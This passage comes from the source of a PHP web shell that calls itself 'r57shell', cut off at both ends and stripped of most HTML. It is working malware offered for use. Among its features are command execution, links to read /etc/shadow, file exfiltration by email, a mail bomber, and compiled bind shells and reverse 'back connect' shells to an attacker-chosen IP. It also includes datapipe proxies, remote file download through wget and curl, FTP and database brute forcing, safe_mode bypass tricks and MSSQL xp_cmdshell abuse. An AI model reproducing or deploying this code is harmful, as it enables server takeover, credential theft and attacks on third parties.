oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN 0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG 9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG 9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0="; if($unix) { if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } if($safe_mode) { $sysctl = '-'; } else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } else { $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } if(empty($sysctl)) { $sysctl = '-'; } setcookie('sysctl',$sysctl); } } if(!isset($_COOKIE[$lang[$language.'_text137']])) { $ust_u=''; if($unix && !$safe_mode){ foreach ($userful as $item) { if(which($item)){$ust_u.=$item;} } } if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";} if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";} if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";} if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";} if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";} if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";} if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";} if(substr($ust_u,0,1)==",") {$ust_u[0]="";} $ust_u = trim($ust_u); setcookie($lang[$language.'_text137'],$ust_u); }else { $ust_u = trim($_COOKIE[$lang[$language.'_text137']]); } if(!isset($_COOKIE[$lang[$language.'_text138']])) { $ust_d=''; if($unix && !$safe_mode){ foreach ($danger as $item) { if(which($item)){$ust_d.=$item;} } } if(!$safe_mode){ foreach ($danger as $item) { if(ps($item)){$ust_d.=$item;} } } if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";} if(substr($ust_d,0,1)==",") {$ust_d[0]="";} $ust_d = trim($ust_d); setcookie($lang[$language.'_text138'],$ust_d); }else { $ust_d = trim($_COOKIE[$lang[$language.'_text138']]); } if(!isset($_COOKIE[$lang[$language.'_text142']])) { $select_downloaders=''; if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "fopen";$downloader="fopen";} if($unix && !$safe_mode){ foreach ($downloaders as $item) { if(which($item)){$select_downloaders .= ''.$item.'';$downloader.=", $item";} } } $select_downloaders .= ''; if(substr($downloader,0,1)==",") {$downloader[0]="";} $downloader=trim($downloader); setcookie('select_downloaders',$select_downloaders); setcookie('downloader',$downloader); }else { $select_downloaders = $_COOKIE['select_downloaders']; $downloader = trim($_COOKIE['downloader']); } echo $head; echo ''; echo '

"; $table_end1 = "
".ws(3); $r .= (!$unix)? str_replace("/","\",$file) : $file; $r .= ""; $r .= "
".$a." ".ws(2).$b."
'; echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; if(!empty($txt)) { echo " $txt"; } echo '
".$t1." ".$t2."

'.'"; if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") { $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."rn"); err(6+$res); $_POST['cmd']=""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) { if($file=moreread($_POST['loc_file'])){ $filedump = $file; } else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; } if(!empty($_POST['cmd'])) { $filename = @basename($_POST['loc_file']); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump ); if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); err(6+$res); $_POST['cmd']=""; } } if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) { for($h=1;$h<=$_POST['mail_flood'];$h++){ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."rn"); } err(6+$res); $_POST['cmd']=""; } if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") { $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name ''.$_POST['s_mask'].'' | xargs grep -E ''.$_POST['s_text'].'''; } if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") { switch($_POST['what']) { case 'own': @chown($_POST['param1'],$_POST['param2']); break; case 'grp': @chgrp($_POST['param1'],$_POST['param2']); break; case 'mod': @chmod($_POST['param1'],intval($_POST['param2'], 8)); break; } $_POST['cmd']=""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") { switch($_POST['what']) { case 'file': if($_POST['action'] == "create") { if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } else { $_POST['e_name'] = $_POST['mk_name']; $_POST['cmd']="edit_file"; echo ""; } } else if($_POST['action'] == "delete") { if(@unlink($_POST['mk_name'])) echo ""; $_POST['cmd']=""; } break; case 'dir': if($_POST['action'] == "create"){ if(@mkdir($_POST['mk_name'])) { $_POST['cmd']=""; echo ""; } else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } } else if($_POST['action'] == "delete"){ if(@rmdir($_POST['mk_name'])) echo ""; $_POST['cmd']=""; } break; } } if(!empty($_POST['cmd']) && $_POST['cmd']=="touch") { if(!$_POST['file_name_r']) { $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds"; $datar = @strtotime($datar); @touch($_POST['file_name'],$datar,$datar);} else{ @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r'])); } $_POST['cmd']=""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) { if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; } elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; } elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };} else { err(1,$_POST['e_name']); $_POST['cmd']=""; } if(!empty($_POST['cmd'])) { echo $table_up3; echo $font; echo ""; echo ws(3)."".$_POST['e_name'].""; echo "

"; echo ""; echo ""; echo ""; echo (!empty($only_read)?("

".$lang[$language.'_text44']):("

")); echo "

"; echo ""; echo ""; echo "

'. ws(2).''.ws(2).'
r57shell
v.'.$version.''. $fs.'
'.$lang[$language.'_text143']."".$tempdir."
".$select_tempdir.'
'.in('submit','submit',0,$lang[$language.'_butt6']). '
'.$fe.'
'; echo ws(2)."".date ("d-m-Y H:i:s")." Your IP: [".gethostbyname($_SERVER["REMOTE_ADDR"])."]"; echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[".$_SERVER['HTTP_X_FORWARDED_FOR']."]";}else{echo "[NONE]";} echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[".$_SERVER['HTTP_CLIENT_IP']."]";}else{echo "[NONE]";} echo " Server IP: [".gethostbyname($_SERVER["HTTP_HOST"])."]"; echo "
"; echo ws(2)."PHP version: ".@phpversion().""; $curl_on = @function_exists('curl_version'); echo ws(2); echo "cURL: ".(($curl_on)?("ON"):("OFF")); echo "".ws(2); echo "MySQL: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ON"; } else { echo "OFF"; } echo "".ws(2); echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ON";}else{echo "OFF";} echo "".ws(2); echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ON";}else{echo "OFF";} echo "".ws(2); echo "Oracle: "; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "ON";}else{echo "OFF";} echo "".ws(2); echo "MySQLi: "; $mysqli_on = @function_exists('mysqli_connect'); if($mysqli_on){echo "ON";}else{echo "OFF";} echo "".ws(2); echo "mSQL: "; $msql_on = @function_exists('msql_connect'); if($msql_on){echo "ON";}else{echo "OFF";} echo "".ws(2); echo "SQLite: "; $sqlite_on = @function_exists('sqlite_open'); if($sqlite_on){echo "ON";}else{echo "OFF";} echo "
".ws(2); echo "Safe_mode: "; echo (($safe_mode)?("ON"):("OFF")); echo "".ws(2); echo "Open_basedir: "; if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "ini_get disable!";}else {echo "$df";};} else {echo "NONE";} echo ws(2)."Safe_exec_dir: "; if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "NONE";}else {echo "$df";};} else {echo "ini_get disable!";} echo ws(2)."Safe_gid: "; if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "ON";}else {echo "OFF";};} else {echo "ini_get disable!";} echo ws(2)."Safe_include_dir: "; if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "NONE";}else {echo "$df";};} else {echo "ini_get disable!";} echo ws(2)."Sql.safe_mode: "; if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "ON";}else {echo "OFF";};} else {echo "ini_get disable!";} echo "
".ws(2); echo "Disable functions : ";$df='ini_get disable!'; if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";} if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);} elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';} if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} echo "
".ws(2)."Free space : ".view_size($free)." Total space: ".view_size($all).""; if($ust_u){echo "
".ws(2).$lang[$language.'_text137'].": ".$ust_u."";}; if($ust_d){echo "
".ws(2).$lang[$language.'_text138'].": ".$ust_d."";}; if($downloader){echo "
".ws(2).$lang[$language.'_text142'].": ".$downloader."";}; echo "
".ws(2).""; echo ws(2).$lb." phpinfo ".$rb; echo ws(2).$lb." php.ini ".$rb; echo ws(2).$lb." cpu ".$rb; echo ws(2).$lb." mem ".$rb; if(!$unix) { echo ws(2).$lb." systeminfo ".$rb; }else{ echo ws(2).$lb." syslog ".$rb; echo ws(2).$lb." resolv ".$rb; echo ws(2).$lb." hosts ".$rb; echo ws(2).$lb." shadow ".$rb; echo ws(2).$lb." passwd ".$rb; } echo ws(2).$lb." tmp ".$rb; echo ws(2).$lb." delete ".$rb; if($unix && !$safe_mode) { echo "
".ws(2).""; echo ws(2).$lb." procinfo ".$rb; echo ws(2).$lb." version ".$rb; echo ws(2).$lb." free ".$rb; echo ws(2).$lb." dmesg ".$rb; echo ws(2).$lb." vmstat ".$rb; echo ws(2).$lb." lspci ".$rb; echo ws(2).$lb." lsdev ".$rb; echo ws(2).$lb." interrupts ".$rb; echo ws(2).$lb." realise1 ".$rb; echo ws(2).$lb." realise2 ".$rb; echo ws(2).$lb." lsattr ".$rb; echo "
".ws(2).""; echo ws(2).$lb." w ".$rb; echo ws(2).$lb." who ".$rb; echo ws(2).$lb." uptime ".$rb; echo ws(2).$lb." last ".$rb; echo ws(2).$lb." ps aux ".$rb; echo ws(2).$lb." service ".$rb; echo ws(2).$lb." ifconfig ".$rb; echo ws(2).$lb." netstat ".$rb; echo ws(2).$lb." fstab ".$rb; echo ws(2).$lb." fdisk ".$rb; echo ws(2).$lb." df -h ".$rb; } echo '
'; echo $font; if($unix){ echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'

'; echo "
"; echo ""; echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
")); echo ws(3).$sysctl."
"; echo ws(3).ex('echo $OSTYPE')."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; if(!empty($id)) { echo ws(3).$id."
"; } else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
'; } else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
"; echo ws(3).$dir; echo ws(3).'( '.perms(@fileperms($dir)).' )'; echo "
"; } else { echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'

'; echo "
"; echo ""; echo ws(3).@substr(@php_uname(),0,120)."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; echo ws(3).@getenv("USERNAME")."
"; echo ws(3).$dir; echo "
"; } echo ""; echo "
".$lang[$language.'_text61']."
".$lang[$language.'_text63']."
".$lang[$language.'_text62']."
".$lang[$language.'_text64']."

"; exit(); } } if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") { $mtime = @filemtime($_POST['e_name']); if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); } else { if($unix) $_POST['e_text']=@str_replace("rn","n",$_POST['e_text']); morewrite($_POST['e_name'],$_POST['e_text']); $_POST['cmd']=""; echo "

".$lang[$language.'_text45']."

"; } @touch($_POST['e_name'],$mtime,$mtime); } if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl")) { cf($tempdir.'prxpl',$prx_pl); $p2=which("perl"); $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &'); @unlink($tempdir.'prxpl'); $_POST['cmd']="ps -aux | grep prxpl"; } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) { cf($tempdir.'bd.c',$port_bind_bd_c); $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c'); @unlink($tempdir.'bd.c'); $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &'); @unlink($tempdir.'bd'); $_POST['cmd']="ps -aux | grep bd"; } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) { cf($tempdir.'bdpl',$port_bind_bd_pl); $p2=which("perl"); $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &'); @unlink($tempdir.'bdpl'); $_POST['cmd']="ps -aux | grep bdpl"; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) { cf($tempdir.'back',$back_connect); $p2=which("perl"); $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &'); @unlink($tempdir.'back'); $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...""; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) { cf($tempdir.'back.c',$back_connect_c); $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c'); @unlink($tempdir.'back.c'); $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &'); @unlink($tempdir.'back'); $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...""; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) { cf($tempdir.'dp',$datapipe_pl); $p2=which("perl"); $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &'); @unlink($tempdir.'dp'); $_POST['cmd']="ps -aux | grep dp"; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) { cf($tempdir.'dpc.c',$datapipe_c); $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c'); @unlink($tempdir.'dpc.c'); $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &'); @unlink($tempdir.'dpc'); $_POST['cmd']="ps -aux | grep dpc"; } if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } for($upl=0;$upl<=16;$upl++) { if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){ if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; } else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; } @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn) or print("

Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."

"); } } if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) { switch($_POST['with']) { case 'fopen': $datafile = @implode("", @file($_POST['rem_file'])); if($datafile) { if(!morewrite($_POST['loc_file'],$datafile)){ err(0);}; } $_POST['cmd'] = ''; break; case 'wget': $_POST['cmd'] = which('wget')." "".$_POST['rem_file']."" -O "".$_POST['loc_file']."""; break; case 'fetch': $_POST['cmd'] = which('fetch')." -p "".$_POST['rem_file']."" -o "".$_POST['loc_file']."""; break; case 'lynx': $_POST['cmd'] = which('lynx')." -source "".$_POST['rem_file']."" > "".$_POST['loc_file']."""; break; case 'links': $_POST['cmd'] = which('links')." -source "".$_POST['rem_file']."" > "".$_POST['loc_file']."""; break; case 'GET': $_POST['cmd'] = which('GET')." "".$_POST['rem_file']."" > "".$_POST['loc_file']."""; break; case 'curl': $_POST['cmd'] = which('curl')." "".$_POST['rem_file']."" -o "".$_POST['loc_file']."""; break; } } if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down"))) { list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { err(3); } else { if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } else { if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);} if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);} } } @ftp_close($connection); $_POST['cmd'] = ""; } if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute"))) { if($_POST['cmd']=="ftp_brute"){ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); }else if($_POST['cmd']=="db_brute"){ $connection = 1; } if(!$connection) { err(3); $_POST['cmd'] = ""; } else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "

".$lang[$language.'_text96']."

"; $_POST['cmd'] = ""; } else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "

Can't get password list

"; $_POST['cmd'] = ""; } if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);} } echo $table_up3; if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; } echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."

"; else printf("% 7s ",$size); } else{ if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); }else{$owner['name']=$grgid['name']='';} echo $inode." "; echo perms(@fileperms($file)); @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo @date("d.m.Y H:i ",$mtime); } echo "$filen"; } } elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; @clearstatcache(); @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if(!$unix){ echo date("d.m.Y H:i",$mtime); if(@is_dir($file)) echo ""; else printf("% 7s ",$size); } else{ if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); }else{$owner['name']=$grgid['name']='';} echo $inode." "; echo perms(@fileperms($file)); @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo @date("d.m.Y H:i ",$mtime); } echo "$filen"; } $d->close(); } elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) { while (false!==($file=@readdir($d))) { if ($file=="." || $file=="..") continue; @clearstatcache(); @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if(!$unix){ echo date("d.m.Y H:i",$mtime); if(@is_dir($file)) echo ""; else printf("% 7s ",$size); } else{ if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); }else{$owner['name']=$grgid['name']='';} echo $inode." "; echo perms(@fileperms($file)); @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo @date("d.m.Y H:i ",$mtime); } echo "$filen"; } @closedir($d); } elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath']))) { echo "PHP glob() listing directory Safe_mode bypass Exploitrnrn"; function eh($errno, $errstr, $errfile, $errline) { global $D, $c, $i; preg_match("/SAFE MODE Restriction in effect..*whose uid is(.*)is not allowed to access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } $error_reporting = @ini_get('error_reporting'); error_reporting(E_WARNING); @ini_set("display_errors", 1); @ini_alter("display_errors", 1); $root = "/"; if($dir) $root = $dir; $c = 0; $D = array(); @set_error_handler("eh"); $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; for($i=0; $i < strlen($chars); $i++) { $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; $prevD = $D[count($D)-1]; @glob($path."*"); if($D[count($D)-1] != $prevD) { for($j=0; $j < strlen($chars); $j++) { $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; $prevD2 = $D[count($D)-1]; @glob($path."*"); if($D[count($D)-1] != $prevD2) { for($p=0; $p < strlen($chars); $p++) { $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; $prevD3 = $D[count($D)-1]; @glob($path."*"); if($D[count($D)-1] != $prevD3) { for($r=0; $r < strlen($chars); $r++) { $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; @glob($path."*"); } } } } } } } $D = array_unique($D); foreach($D as $item) echo "{$item}rn"; echo "rn Generation time: ".round(@getmicrotime()-starttime,4)." secrn"; error_reporting($error_reporting); } elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath']))) { echo "PHP realpath() listing directory Safe_mode bypass Exploitrnrn"; if(!$dir){$dir='/etc/';}; if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';} if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';} if($realpath=realpath($dir.'/')){echo $realpath."rn";} if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."rn";} foreach($presets_rlph as $preset_rlph){ if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."rn";} } for($i=0; $i < strlen($chars_rlph); $i++){ if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."rn";} if($n_rlph<=1){continue;}; for($j=0; $j < strlen($chars_rlph); $j++){ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."rn";} if($n_rlph<=2){continue;}; for($x=0; $x < strlen($chars_rlph); $x++){ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."rn";} if($n_rlph<=3){continue;}; for($y=0; $y < strlen($chars_rlph); $y++){ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."rn";} if($n_rlph<=4){continue;}; for($z=0; $z < strlen($chars_rlph); $z++){ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."rn";} if($n_rlph<=5){continue;}; for($w=0; $w < strlen($chars_rlph); $w++){ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."rn";} } } } } } } echo "rn Generation time: ".round(@getmicrotime()-starttime,4)." secrn"; } else echo $lang[$language.'_text29']; break; case 'test1': $ci = @curl_init("file://".$_POST['test1_file']); $cf = @curl_exec($ci); echo htmlspecialchars($cf); break; case 'test2': @include($_POST['test2_file']); break; case 'test3': if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); if($db) { if(@mysql_select_db($_POST['test3_md'],$db)) { @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )"); /* @mysql_query("LOAD DATA INFILE "".$_POST['test3_file']."" INTO TABLE temp_r57_table");*/ @mysql_query("LOAD DATA LOCAL INFILE "".$_POST['test3_file']."" INTO TABLE temp_r57_table"); $r = @mysql_query("SELECT * FROM temp_r57_table"); while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."rn"; } @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); } else echo "[-] ERROR! Can't select database"; @mysql_close($db); } else echo "[-] ERROR! Can't connect to mysql server"; break; case 'test4': if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); if($db) { if(@mssql_select_db($_POST['test4_md'],$db)) { @mssql_query("drop table r57_temp_table",$db); @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); $res = mssql_query("select * from 